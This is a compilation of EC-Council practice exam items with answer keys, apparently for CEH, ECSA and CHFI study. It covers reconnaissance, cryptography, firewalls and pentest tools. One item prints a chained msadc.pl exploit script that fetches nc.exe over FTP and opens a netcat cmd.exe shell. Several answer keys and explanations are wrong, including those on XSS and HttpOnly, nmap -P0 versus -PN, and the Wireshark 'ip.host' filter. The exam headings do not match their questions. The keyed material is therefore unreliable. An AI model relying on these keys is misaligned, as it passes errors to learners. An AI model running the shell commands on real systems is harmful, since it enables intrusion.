Certified Ethical Hacker (CEH) Practice Exams

Through which type of method is information collected during the passive reconnaissance?

Options are :

  • Social engineering
  • Network traffic sniffing
  • Man in the middle attacks
  • Publicly accessible sources (Correct)

Answer : Publicly accessible sources

Explanation Passive reconnaissance focuses on collecting information that is widely and openly available from publicly accessible sources. While network traffic sniffing is considered to be a passive activity, gaining access to the network to place a sniffer in a good network tap location would not be considered passive. Of the choices provided, Publicly Accessible Sources is the BEST answer.

ECCouncil 412-79 Certified Security Analyst (ECSA) Exam Set 5

Which is NOT an asymmetric cryptographic standard?

Options are :

  • DSA
  • PKI
  • RSA
  • 3DES (Correct)

Answer : 3DES

Explanation 3DES is a symmetric cryptographic standard. Triple DES (3DES), officially the Triple Data Encryption Algorithm (TDEA or Triple DEA), is a symmetric-key block cipher, which applies the DES cipher algorithm three times to each data block. All of the other options are asymmetric cryptographic methods.

What is a component of a risk assessment?

Options are :

  • Physical security
  • Administrative safeguards (Correct)
  • DMZ
  • Logical interface

Answer : Administrative safeguards

Explanation Administrative safeguards focus on internal organization, policies, procedures, and maintenance of security measures that protect patient health information. They are a specific subset of the HIPAA Security Rule and are critical in securing healthcare data. The other options all represent either physical or technical safeguards, as defined by HIPAA.

What data-gathering activities are performed during a risk assessment?

Options are :

  • Threat identification, vulnerability identification, control analysis (Correct)
  • Threat identification, response identification, mitigation identification
  • Attack profile, defense profile, loss profile
  • System profile, vulnerability identification, security determination

Answer : Threat identification, vulnerability identification, control analysis

Explanation Threat identification, vulnerability identification, and a risk control analysis should be performed as part of a comprehensive risk assessment according to the NIST SP 800-39 (NIST Cybersecurity Framework).

EC0-349 ECCouncil Computer Hacking Forensic Investigator Set 1

In your company, all email messages are required to be digitally signed when sent through an insecure channel (such as the Internet). By using a digital signature, the receiver of the message receives a validation that the message was sent by the original sender, providing integrity and non-repudiation. The digital signature consists of a message digest (hash) that is encrypted with what kind of encryption key?

Options are :

  • Public key of the sender
  • Private key of the receiver
  • Public key of the receiver
  • Private key of the sender (Correct)

Answer : Private key of the sender

Explanation A digital signature is simply a hash of the email message which is then encrypted with the sender's private key. This can be decrypted by anyone with access to the sender's public key, therefore there is no confidentiality gained. But, since only the sender has access to their private key, there is non-repudiation. The hashing of the email is what creates the integrity.

At what level of the OSI model does a circuit-level gateway firewall operate?

Options are :

  • Layer 5 - Session (Correct)
  • Layer 4 - Transport
  • Layer 3 - Network
  • Layer 2 - Data link

Answer : Layer 5 - Session

Explanation A circuit-level gateway firewall works at the session layer (layer 5) of the OSI model, between the application layer and the transport layer of the TCP/IP stack. These firewalls monitor TCP handshaking between packets to determine whether a requested session is actually legitimate.

What problem can be caused by low humidity in a data center?

Options are :

  • Heat
  • Corrosion
  • Static electricity (Correct)
  • Airborne contamination

Answer : Static electricity

Explanation Low humidity in a data center can cause a buildup of static electricity. To minimize this, it is recommended that a data center maintain a humidity level of 45-55%. If the humidity gets too high, corrosion of the components could occur.

EC0-232 EC-Council E-Commerce Architect Practice Test Set 8

A penetration tester discovered a web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the web server. While the msadc.pl script is effective, the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a perl script that runs the following msadc commands:

system("perl msadc.pl -h $host -C \"echo $user>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>tempfile\"");
system("perl msadc.pl -h $host -C \"ftp \-s\:tempfile\"");
$o=print "Opening FTP connection...\n";system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");

Which exploit is indicated by this script?

Options are :

  • Buffer overflow exploit
  • Chained exploit (Correct)
  • SQL injection exploit
  • Denial of Service exploit

Answer : Chained exploit

Explanation This is an example of a chained exploit because it combines several programs into one, including writing to a temporary file, netcat usage, and ftp usage. Chained exploits integrate more than one form of attack to accomplish their goal.

What process sends specially crafted packets to a remote host and analyzes the responses received from the remote host’s operating system?

Options are :

  • Passive fingerprinting
  • Reflective fingerprinting
  • Active fingerprinting (Correct)
  • Distributive fingerprinting

Answer : Active fingerprinting

Explanation Active fingerprinting is the process of transmitting packets to a remote host and analyzing corresponding replies.

An attacker is searching in Google for Cisco VPN configuration files by using the filetype:pdf modifier. The attacker was able to locate several of these configuration files and now wants to decode any connectivity passwords that they might contain. What tool should the attacker use?

Options are :

  • Cupp
  • Nessus scripting engine
  • Cain and Abel (Correct)
  • John The Ripper Pro

Answer : Cain and Abel

Explanation Cain and Abel is a popular password cracking tool. It can recover many kinds of passwords using methods such as network packet sniffing and cracking various password hashes with dictionary, brute force and cryptanalysis attacks. It also includes a module to conduct Cisco VPN Client Password Decoding. CUPP is used to create password lists. Nessus is a vulnerability scanner. John the Ripper is a password cracking tool, but cannot specifically target Cisco VPN configuration files like Cain and Abel can.

312-50v7 Ethical Hacking and Countermeasures V7 Part 2 Exam Set 5

A Certificate Authority (CA) generates a key pair that will be used for encryption and decryption of emails. If you are worried about the integrity of an encrypted email, what must be protected?

Options are :

  • Public key
  • Private key (Correct)
  • Modulus length
  • Email server certificate

Answer : Private key

Explanation The integrity of an encrypted email is assured through the use of digital signatures. A digital signature is a hash of the email which is then encrypted using the sender's private encryption key.

You are trying to setup a PCAP filter in Wireshark to capture all TCP traffic going to or from a host with an IP address of 10.0.0.26 over port 143. What should your filter include?

Options are :

  • tcp.src == 143 and ip.host == 10.0.0.26
  • host 10.0.0.26:143
  • port 143 and host 10.0.0.26
  • tcp.port == 143 and ip.host == 10.0.0.26 (Correct)

Answer : tcp.port == 143 and ip.host == 10.0.0.26

Explanation Using tcp.port == 143 and ip.host == 10.0.0.26 will set your PCAP filter to only capture traffic going to or from port 143, and to or from host 10.0.0.26.

What is the name of a strong post designed to stop a car?

Options are :

  • Gate
  • Fence
  • Bollard (Correct)
  • Reinforced concrete

Answer : Bollard

Explanation A bollard is a sturdy, short, vertical post. Although it originally described a post on a ship or quay used principally for mooring boats, the word is now used primarily to describe posts installed to control road traffic and posts designed to prevent car ramming attacks.

ECCouncil EC0-232 ec0-232 E-Commerce Architect Practice Exam Set 5

What command would a pentester use to determine the settings of the built-in Windows firewall once they have gained access to a Windows application server?

Options are :

  • netsh firewall show config (Correct)
  • WMIC firewall show config
  • net firewall show config
  • ipconfig firewall show config

Answer : netsh firewall show config

Explanation Netsh commands for Windows Firewall provide a command-line alternative to the capabilities of the Windows Firewall Control Panel utility. By using the Netsh firewall commands, you can configure and view Windows Firewall exceptions and configuration settings.

What is the Advanced Encryption Standard (AES) algorithm used for?

Options are :

  • Data integrity
  • Key discovery
  • Bulk data encryption (Correct)
  • Key recovery

Answer : Bulk data encryption

Explanation AES is a symmetric block cipher used to provide bulk data encryption.

Which of these statements is true concerning LM hashes?

Options are :

  • LM hashes consist of 48 hexadecimal characters
  • LM hashes are based on AES128 cryptographic standard
  • Uppercase characters in the password are converted to lowercase
  • LM hashes are not generated when the password length exceeds 14 characters (Correct)

Answer : LM hashes are not generated when the password length exceeds 14 characters

Explanation LM hash, also known as LanMan hash or LAN Manager hash, is a compromised password hashing function that was the primary hash that Microsoft LAN Manager and Microsoft Windows versions prior to Windows NT used to store user passwords. Support for the legacy LAN Manager protocol continued in later versions of Windows for backward compatibility, but Microsoft recommended that administrators turn it off due to the weak strength of the LM hash. LM hashes are not generated when the password length exceeds 14 characters since the hash is stored as a 16-byte value.

EC1-349 ECCouncil Computer Hacking Forensic Investigator Set 2

An attacker has issued the following command:
nc -l -p 8080 | nc 192.168.1.76 443

Based on this command, what will occur?

Options are :

  • Netcat will listen on the 192.168.1.76 interface for 443 seconds on port 8080.
  • Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443. (Correct)
  • Netcat will listen for a connection from 192.168.1.76 on port 443 and output anything received to port 8080.
  • Netcat will listen on port 8080 and then output anything received to local interface 192.168.1.76.

Answer : Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443.

Explanation The proper syntax for netcat (nc) is -l to signify listening and -p to specify the listening port. Then, the | character allows multiple commands to be run during a single command execution. Next, netcat is being told to send the data to the given IP (192.168.1.76) over port 443. This is a common technique to try to bypass the firewall by sending traffic over port 443 (a secure SSL/TLS tunnel).

What technique is most effective in determining whether or not increasing end-user security training would be beneficial to the organization during your technical assessment of their network?

Options are :

  • Vulnerability scanning
  • Social engineering (Correct)
  • Application security testing
  • Network sniffing

Answer : Social engineering

Explanation Social engineering refers to psychological manipulation of people into performing actions or divulging confidential information. During your technical assessment, utilizing social engineering techniques such as phishing or pharming can help you determine if additional end-user security training should be included at the organization. The other three options focus solely on technical controls, therefore adding end-user training would have no effect on these technology options.

What algorithm and key strength does Public Key Infrastructure (PKI) use?

Options are :

  • RSA, 2048 bit (Correct)
  • AES, 1024 bit
  • RSA, 1024 bit
  • AES, 256 bit

Answer : RSA, 2048 bit

Explanation In PKI, the RSA algorithm is utilized, generally with a key strength of 2048 bits or higher.

ECCouncil ECSS Certified Security Specialist Practice Exam Set 5

What should administrators perform to reduce the attack surface of a system and to remove unnecessary software, services, and insecure configuration settings?

Options are :

  • Harvesting
  • Windowing
  • Hardening (Correct)
  • Stealthing

Answer : Hardening

Explanation Hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle a single-function system is more secure than a multipurpose one. Reducing available ways of attack typically includes changing default passwords, the removal of unnecessary software, unnecessary usernames or logins, and the disabling or removal of unnecessary services.

Your organization is choosing new mobile phones for use across the enterprise, and one of the executives requests that you consider Blackberry devices. As a cyber security analyst, you want to evaluate the devices for possible threats. You decided to use a Blackjacking attack to show the executive that the enterprise’s perimeter network defenses could be circumvented by using the Blackberry device and an attacker could gain access to the organization’s network. What tool should you use to perform a Blackjacking attack?

Options are :

  • Burp Suite
  • BBproxy (Correct)
  • BBcrack
  • Blooover

Answer : BBproxy

Explanation BBproxy is a security assessment tool written in Java that runs on Blackberry devices. It allows the Blackberry device to be used as a proxy between the Internet and an internal network, thereby representing a significant security threat to the enterprise.

A cybersecurity analyst is conducting a network audit to determine if there are any deviations from the established security policies. The analyst discovered a user from the IT department had installed a dial-up modem. If the analyst checks to see if dial-up modems are allowed by the organization, what security policy should they review?

Options are :

  • Firewall management policy
  • Acceptable use policy
  • Remote access policy (Correct)
  • Memorandum of understanding policy

Answer : Remote access policy

Explanation The remote access policy is a document which outlines and defines acceptable methods of remotely connecting to the internal network. It is essential in large organizations where networks are geographically dispersed and extend into insecure network locations such as public networks or unmanaged home networks. If a dial-up modem is authorized, it would be listed as an approved method in the remote access policy.

ECCouncil 412-79 Certified Security Analyst (ECSA) Exam Set 4

The organization has some publicly hosted web applications, as well as an internal Intranet server that is protected by a firewall. What technique will help the organization protect itself against enumeration?

Options are :

  • Reject all invalid emails received via SMTP
  • Allow full DNS zone transfers
  • Remove A records for internal hosts (Correct)
  • Enable null session pipes

Answer : Remove A records for internal hosts

Explanation Any internal server names and IPs should have their A records removed from the external DNS server, since only internal users should need to access them. Those internal servers should only have A records on your internal DNS servers, and those records should not be forwarded outside of the firewall boundary.

A penetration tester hired by a bank began searching for the bank’s IP ranges by performing lookups on the bank's DNS servers, reading news articles online about the bank, monitoring what times the bank’s employees came into and left work, searching job postings (with a special focus on the bank’s information technology jobs), and even searching the dumpster at the bank’s corporate office. Based on this description, what portion of the penetration test is being conducted?

Options are :

  • Information reporting
  • Vulnerability assessment
  • Active information gathering
  • Passive information gathering (Correct)

Answer : Passive information gathering

Explanation Passive information gathering consists of numerous activities where the penetration tester gathers information that is open-source or publicly available, without the organization under investigation being aware that the information has been accessed.

What information from the recipient must the sender have before encrypting a message when sending a message as a PGP encrypted message?

Options are :

  • Private key of the recipient
  • Public key of the recipient (Correct)
  • Master encryption key
  • Public key of the sender

Answer : Public key of the recipient

Explanation In order for the sender to securely encrypt the message, they must have the recipient’s public key. This will ensure that only the recipient can decrypt the message using their own private key, since PGP operates using asymmetric encryption.

312-50 Certified Ethical Hacker Certification Practice Exam Set 6

What tool is used to copy files from USB devices silently?

Options are :

  • USB Grabber
  • USB Dumper (Correct)
  • USB Sniffer
  • USB Snoopy

Answer : USB Dumper

Explanation USB Dumper runs silently as a background process once started and copies the complete contents of every connected USB device to the system without the knowledge of the user. It creates a directory with the current date and begins the background copying process. The user has no indication that the files stored on the USB device are copied from the USB to the local system.

What statement is correct concerning proxy firewalls?

Options are :

  • Increase the speed and functionality of a network
  • Decentralize all activity for an application
  • Block network packets from passing to and from a protected network
  • Clients establish a connection with the proxy firewall to initiate a new network connection (Correct)

Answer : Clients establish a connection with the proxy firewall to initiate a new network connection

Explanation A proxy firewall is a network security system that protects network resources by filtering messages at the application layer. A proxy firewall may also be called an application firewall or gateway firewall. Just like a proxy server or cache server, a proxy firewall acts as an intermediary between in-house clients and servers on the Internet. Clients first establish a connection with a proxy firewall, and then a new network connection is initiated on the client’s behalf.

A penetration tester found a target that is running Microsoft SQL 2005 with default credentials. They assumed that the service is running with the Local System account credentials. What weakness could the penetration tester exploit to access the system?

Options are :

  • Using the Metasploit psexec module setting the SA/Admin credential
  • Invoking the stored procedure xp_shell to spawn a Windows command shell
  • Invoking the stored procedure cmd_shell to spawn a Windows command shell
  • Invoking the stored procedure xp_cmdshell to spawn a Windows command shell (Correct)

Answer : Invoking the stored procedure xp_cmdshell to spawn a Windows command shell

Explanation By invoking the xp_cmdshell, a Windows command shell will be spawned and the input string passed to it for execution. This could provide the penetration tester with local system level access to the server.

ECCouncil 712-50 Certified CISO (CCISO) Practice Exam Set 4

What is the main disadvantage of using a scripting language instead of a compiled programming language?

Options are :

  • They are harder to learn
  • They are not object-oriented
  • They cannot be used to create graphical user interfaces
  • They are slower because they require an interpreter to run the code (Correct)

Answer : They are slower because they require an interpreter to run the code

Explanation Scripting languages like Python and PHP have become quite capable. They are easier to learn, can be object-oriented, and can even be used to create graphical user interfaces. But, since they are scripting languages, they tend to run much slower than their compiled counterparts, largely due to the need for an interpreter to run the scripts.

If a penetration tester would like to scan every TCP registered port with fingerprinting and service detection from a Class B network that is blocking ICMP, which NMAP command should they use?

Options are :

  • nmap -PN -A -O -p 1-1024 -sS 172.16.1.0/16
  • nmap -P0 -A -O -p 1-1024 172.16.1.0/16 (Correct)
  • nmap -P0 -A -sT -p 0-65535 172.16.1.0/24
  • nmap -PN -O -sS -p 1-65535 172.16.1.0/8

Answer : nmap -P0 -A -O -p 1-1024 172.16.1.0/16

Explanation There are several ways to answer this question, even if you don’t remember every piece of the NMAP syntax. First, the question asks you to scan a Class B network, and if we want to scan the entire Class B, we would have to scan a /16. This removes two of our four choices. Now, considering the last two choices, we have two major differences: -PN and -P0. -PN is used to disable host discovery and only conduct a port scan, which isn’t what we want in this case since we also want fingerprinting and service detection. -P0 is used to tell NMAP to skip the pinging process and go right to scanning. This is useful in our case, because we know the network is blocking ICMP (ping traffic). Therefore, we choose nmap -P0 -A -O -p 1-1024 172.16.1.0/16.

When trying to prevent Web Application attacks, what is TRUE regarding network firewalls?

Options are :

  • Network firewalls can prevent attacks because they can detect malicious HTTP traffic.
  • Network firewalls cannot prevent attacks because ports 80 and 443 must be opened (Correct)
  • Network firewalls can prevent attacks if they are properly configured
  • Network firewalls cannot prevent attacks because they are too complex to configure

Answer : Network firewalls cannot prevent attacks because ports 80 and 443 must be opened

Explanation The only way a network firewall can truly prevent a Web Application attack would be to block web application traffic on ports 80 and 443. But, if you blocked this traffic, you would deny web services to all of the users of the network. For this reason, network firewalls are considered ineffective in preventing Web Application attacks, and you should instead use a Web Application Firewall (WAF) to prevent Web Application attacks like Cross-Site Scripting (XSS) and SQL injection attacks.

ECCouncil 412-79v8 Certified Security Analyst (ECSA) Exam Set 2

A penetration test indicated that Voice Over IP (VOIP) traffic is occurring over the network. What tool could be used to decode a packet capture and extract the voice conversation for analysis?

Options are :

  • Cain & Abel (Correct)
  • John the Ripper
  • Nikto
  • Hping

Answer : Cain & Abel

Explanation Voice over IP (also called VoIP, IP Telephony, and Internet telephony) is technology enabling routing of voice conversations over the Internet or any other IP network. Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless passphrases/keys, and more.

Your organization just completed an external security audit which showed that the network had been breached on several occasions during the past 6 months. You have been asked to investigate, and you discovered your IDS was not properly configured. Due to this configuration error, the IDS was not triggering the alerts when appropriate. How would you classify these alerts?

Options are :

  • True Positive
  • False Negative (Correct)
  • False Positive
  • True Negative

Answer : False Negative

Explanation A False Negative occurs when a result appears negative when it should not. In this example, since the alerts were not being displayed/logged when an actual violation was occurring, this would be a false negative.

What is the broadcast address for the subnet 75.61.94.6/22?

Options are :

  • 75.61.94.255
  • 75.61.255.255
  • 75.61.95.255 (Correct)
  • 75.61.93.255

Answer : 75.61.95.255

Explanation When using a /22 subnet, your subnet mask is 255.255.252.0. This will create a wildcard of 0.0.3.255. Therefore, the broadcast becomes 75.61.95.255.

ECCouncil EC0-232 ec0-232 E-Commerce Architect Practice Exam Set 4

Windows file servers commonly hold sensitive files, databases, passwords and more. What common vulnerability is usually used against a windows file server to expose sensitive files, databases, and passwords?

Options are :

  • Cross-site scripting
  • SQL injection
  • Missing patches (Correct)
  • CRLF injection

Answer : Missing patches

Explanation Missing patches are the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become a victim of the exploit and the data contained on the server can become compromised.

What port and protocol should be opened to send log messages to a log analysis tool residing behind a firewall?

Options are :

  • 123 UDP
  • 541 UDP
  • 514 UDP (Correct)
  • 415 UDP

Answer : 514 UDP

Explanation A syslog server opens port 514 and listens for incoming syslog event notifications (carried by UDP protocol packets) generated by remote syslog clients. Any number of client devices can be programmed to send syslog event messages to the servers.

Diffie-Hellman (DH) groups determine the strength of the key used in the Internet Key Exchange (IKE) process. What is the correct key size of the Diffie-Hellman (DH) Group 14?

Options are :

  • bit key
  • 1024 bit key
  • 1536 bit key
  • 2048 bit key (Correct)

Answer : 2048 bit key

Explanation Group 14 is the minimum acceptable setting for a secure Diffie-Hellman internet key exchange and uses a 2048 bit modulus key. As the group number increases, so does the security of the IKE process.

ECCouncil 312-50 Certified Ethical Hacker Practical Exam Set 4

A hacker successfully modified the sale price of items purchased through your company's web site. During the investigation that followed, the security analyst verified that the web server and Oracle database were not compromised directly. The analyst also found no attacks that could have caused this during their log verification of the Intrusion Detection System (IDS). What is the most likely method that the attacker used to change the sale price of the items purchased?

Options are :

  • SQL injection
  • Changing hidden form values (Correct)
  • Buffer overflow attack
  • Cross-site scripting

Answer : Changing hidden form values

Explanation Since there are no indications in the IDS logs, the database, or the server, it is most likely that the hacker changed hidden form values to change the price of the items in the shopping cart.

What should be done next if the final set of security controls does not eliminate all of the risk in a given system?

Options are :

  • You should continue to apply additional controls until there is zero risk
  • You should ignore any remaining risk
  • You should accept the risk if the residual risk is low enough (Correct)
  • You should remove the current controls since they are not completely effective

Answer : You should accept the risk if the residual risk is low enough

Explanation In most cases, you will be unable to remove all risk. Instead, you should mitigate the risk to a low enough level so that the residual risk can be accepted.

What is an effective method for protecting a router from a smurf attack?

Options are :

  • Placing the router in broadcast mode
  • Enabling port forwarding on the router
  • Installing the router outside of the network's firewall
  • Disabling the router from accepting broadcast ping messages (Correct)

Answer : Disabling the router from accepting broadcast ping messages

Explanation The Smurf attack is a distributed denial-of-service attack in which large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim's spoofed source IP are broadcast to a computer network using an IP broadcast address. If you disable the router from accepting broadcast ping messages, you can mitigate a smurf attack from being effective against your network.

ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 1

What encryption level does WPA2 with AES use for wireless data encryption?

Options are :

  • 64 bit and CCMP
  • 128 bit and CRC
  • 128 bit and CCMP (Correct)
  • 128 bit and TKIP

Answer : 128 bit and CCMP

Explanation WPA2 uses 128-bit AES encryption with CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol).

A software development company's IDS just generated multiple alerts regarding attacks against their external webserver, VPN concentrator, and DNS servers. What should the security incident response team consider when they begin their investigation and where to start first?

Options are :

  • The maintenance schedule of the affected systems
  • The service level agreements of the systems
  • The potential effect of the incident (Correct)
  • The order that the alerts arrived in

Answer : The potential effect of the incident

Explanation The effect and overall impact of a particular incident should determine where the SIRT begins their investigation and response. This will affect restoration and recovery priorities, as well.

What do Ethereal/Wireshark, TCPDump, and Snort have in common?

Options are :

  • All three are written in Java
  • All three send alerts to security monitors
  • All three use the same packet analysis engine
  • All three use the same packet capture utility (Correct)

Answer : All three use the same packet capture utility

Explanation All three software products use the same packet capture utility. The utility is called libpcap on Linux/OS X and WinPcap on Windows; it captures packets travelling over a network, transmits packets on a network at the link layer, and lists the available network interfaces.

ECCouncil 412-79 Certified Security Analyst (ECSA) Exam Set 1

If an attacker uses a communication channel within an operating system that is neither designed nor intended to transfer information, what is the name of that type of channel?

Options are :

  • Classified
  • Overt
  • Encrypted
  • Covert (Correct)

Answer : Covert

Explanation A covert channel transfers information within a computer system or over a network in a way that is outside of the security policy. It is useful to bypass multi-level security solutions in order to leak data out of a protected network. A good example of this is the use of reserved fields in various packet headers/footers to conceal data. A ping packet, for example, is not designed to contain any data, but in the past attackers have placed data in the ping packet's header as a method of creating a covert channel.

A penetration tester finds a web application is vulnerable to Cross Site Scripting (XSS). What condition must be met to exploit this vulnerability?

Options are :

  • Web application does not have the secure flag set
  • Session cookies do not have the HttpOnly flag set (Correct)
  • A user does not have an endpoint security solution
  • The user’s browser must have ActiveX technology enabled.

Answer : Session cookies do not have the HttpOnly flag set

Explanation Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. By not having the HttpOnly flag set for your session cookies, you are vulnerable to an XSS attack.

A firewall administrator has configured a new DMZ to allow public systems to be segmented from the organization’s internal network. The firewall now has three security zones set: Untrusted (Internet) [143.27.43.0/24]; DMZ (DMZ) [161.212.71.0/24]; Trusted (Intranet) [10.10.0.0/24]. The firewall administrator has been asked to enable remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ in order for the Chief Security Officer to be able to work from his home office after hours. What rule should the administrator add to the firewall?

Options are :

  • Permit 143.27.43.0/24 161.212.71.0/24 RDP 3389
  • Permit 143.27.43.32 161.212.71.14 RDP 3389 (Correct)
  • Permit 143.27.43.32 161.212.71.0/24 RDP 3389
  • Permit 143.27.43.0/24 161.212.71.14 RDP 3389

Answer : Permit 143.27.43.32 161.212.71.14 RDP 3389

Explanation Due to the requirement to allow a single remote IP to enter the firewall, the permit statement must start with a single IP in the Untrusted (Internet) zone. Based on the options provided, only 143.27.43.32 could be correct. Next, the destination is a single server in the DMZ, so only 161.212.71.14 could be correct. The destination port should be 3389, which is the port for Remote Desktop Protocol. Combining these three facts, only “Permit 143.27.43.32 161.212.71.14 RDP 3389” could be correct.

EC-Council Certified Security Analyst (ECSA) Exams 2019 Set 3

What access control solution implements two-factor authentication?

Options are :

  • USB token and PIN (Correct)
  • Fingerprint scanner and retina scanner
  • Password and PIN
  • Username and password

Answer : USB token and PIN

Explanation A USB token (something you have) and a PIN (something you know) is an example of two-factor authentication. Fingerprint and retina scanners are both examples of something you are. Usernames, passwords, and PINs are all examples of something you know.

What is a covert channel?

Options are :

  • A channel that transfers information over, within a computer system, or network that is outside of the security policy (Correct)
  • A channel that transfers information over, within a computer system, or network that is within the security policy
  • A channel that transfers information via a communication path within a computer system, or network for transfer of data
  • A channel that transfers information over, within a computer system, or network that is encrypted.

Answer : A channel that transfers information over, within a computer system, or network that is outside of the security policy

Explanation A covert channel transfers information over a network, or within a computer system, in a way that is outside of the security policy. A good example of this is the use of reserved fields in various packet headers/footers to conceal data. A ping packet, for example, is not designed to contain any data, but in the past attackers have placed data in the ping packet's header as a method of creating a covert channel.
